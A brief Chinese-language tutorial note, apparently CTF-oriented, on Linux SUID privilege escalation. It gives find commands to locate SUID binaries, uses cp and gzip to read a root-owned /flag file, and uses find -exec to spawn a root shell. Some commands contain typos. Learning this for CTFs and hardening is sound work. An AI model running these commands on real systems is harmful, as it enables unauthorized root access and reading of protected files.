suid 提权
SUID(Set User ID)是一种特殊权限,当用户执行具有SUID位的可执行文件时,该文件将以文件所有者的身份而不是执行者的身份运行。这允许普通用户在执行特定程序时获取特权权限。
1.查找具有suid权限的文件
find / -user root -perm -4000-exec ls -ldb {} \;
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/del/null
2.利用文件提权
/bin下的文件实际就是我们执行的命令,可以看到cp命令是有suid权限的(这个不同的系统不一样),我们在执行cp命令时就会有root权限,可以读取更高权限的文件
例如:cp /flag_dd3f6380aa0d /dev/stdout
如果find命令也有suid权限,我们也可以执行
find text.sh -exec "/bin/sh" \;
效果就是在当前目录下查找名为"text.sh"的文件,并以root权限打开一个新的shell。
gzip -f /flag -t //gzip读文件